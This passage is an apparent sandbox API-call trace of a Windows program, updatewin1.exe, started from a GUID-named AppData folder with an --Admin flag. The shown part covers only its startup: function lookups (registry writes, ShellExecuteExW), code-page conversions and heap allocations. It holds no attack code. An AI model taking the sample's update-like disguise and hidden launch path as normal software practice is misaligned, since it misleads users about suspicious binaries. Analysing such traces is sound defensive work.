lpProcName="GetOEMCP") returned 0x76e4d1a1 [0083.891] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0083.891] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0083.891] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0083.891] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0083.891] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0083.892] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0083.892] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0083.892] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0083.892] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0083.892] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0083.892] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeSListHead") returned 0x773594a4 [0083.892] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0083.892] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0083.892] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0083.892] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0083.892] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0083.893] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0083.893] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0083.893] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0083.893] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0083.893] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0083.893] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0083.893] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0083.893] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0083.893] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0083.893] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0083.894] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileExW") returned 0x76e31811 [0083.895] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0083.895] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0083.895] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x754b0000 [0083.895] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExW") returned 0x754c468d [0083.895] GetProcAddress (hModule=0x754b0000, lpProcName="RegCloseKey") returned 0x754c469d [0083.895] GetProcAddress (hModule=0x754b0000, lpProcName="RegCreateKeyExW") returned 0x754c40fe [0083.895] GetProcAddress (hModule=0x754b0000, lpProcName="SetSecurityDescriptorDacl") returned 0x754c415e [0083.895] GetProcAddress (hModule=0x754b0000, lpProcName="InitializeSecurityDescriptor") returned 0x754c4620 [0083.896] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExW") returned 0x754c14d6 [0083.896] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0083.896] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteExW") returned 0x75691e46 [0083.896] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0083.896] GetProcAddress (hModule=0x75670000, lpProcName="CommandLineToArgvW") returned 0x75689ee8 [0083.896] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0083.896] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0083.896] GetProcAddress (hModule=0x753b0000, lpProcName="PathFileExistsA") returned 0x753ead1a [0083.897] GetProcAddress (hModule=0x753b0000, lpProcName="PathRemoveFileSpecW") returned 0x753c3248 [0083.897] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74390000 [0083.900] GetProcAddress (hModule=0x74390000, lpProcName="atexit") returned 0x743ac544 [0083.900] atexit (param_1=0x5c63e0) returned 0 [0083.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x9e14d380, dwHighDateTime=0x1d5d6b4)) [0083.901] GetCurrentThreadId () returned 0x880 [0083.901] GetCurrentProcessId () returned 0x868 [0083.901] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=22434224187) returned 1 [0083.910] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0083.911] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.911] GetLastError () returned 0x57 [0083.912] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.912] GetLastError () returned 0x57 [0083.912] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0083.912] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0083.912] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.912] GetLastError () returned 0x57 [0083.912] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0083.912] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0083.914] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.914] GetLastError () returned 0x57 [0083.914] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.914] GetLastError () returned 0x57 [0083.914] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0083.914] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0083.915] GetProcessHeap () returned 0x5b0000 [0083.915] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.915] GetLastError () returned 0x57 [0083.915] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0083.915] GetLastError () returned 0x57 [0083.915] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0083.916] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x364) returned 0x5da9f0 [0083.916] SetLastError (dwErrCode=0x57) [0083.917] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc00) returned 0x5dad60 [0083.919] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0xa6b7b8ce, hStdError=0xfffffffe)) [0083.919] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.919] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0083.919] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.920] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" --Admin" [0083.920] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe\" --Admin" [0083.920] IsValidCodePage (CodePage=0x4e4) returned 1 [0083.920] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0083.920] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0083.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0083.920] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0083.983] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.983] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0083.983] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.983] GetLastError () returned 0x57 [0083.983] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0083.983] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0083.983] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0083.983] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x16\x1dî¦Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0083.983] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.983] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0083.983] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0083.984] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0083.984] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x16\x1dî¦Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5da0d8 [0083.984] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe")) returned 0x5f [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xdc) returned 0x5dc168 [0083.984] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0083.984] GetLastError () returned 0x0 [0083.984] GetEnvironmentStringsW () returned 0x5dc250* [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xaca) returned 0x5dcd28 [0083.984] FreeEnvironmentStringsW (penv=0x5dc250) returned 1 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x98) returned 0x5dc250 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3e) returned 0x5dc2f0 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6c) returned 0x5dc338 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6e) returned 0x5dc3b0 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x78) returned 0x5c1188 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x62) returned 0x5dc428 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c52d8 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x48) returned 0x5dc498 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x28) returned 0x5da160 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1a) returned 0x5dbd18 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4a) returned 0x5dc4e8 [0083.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x72) returned 0x5c1208 [0083.984] RtlAllocateHeap 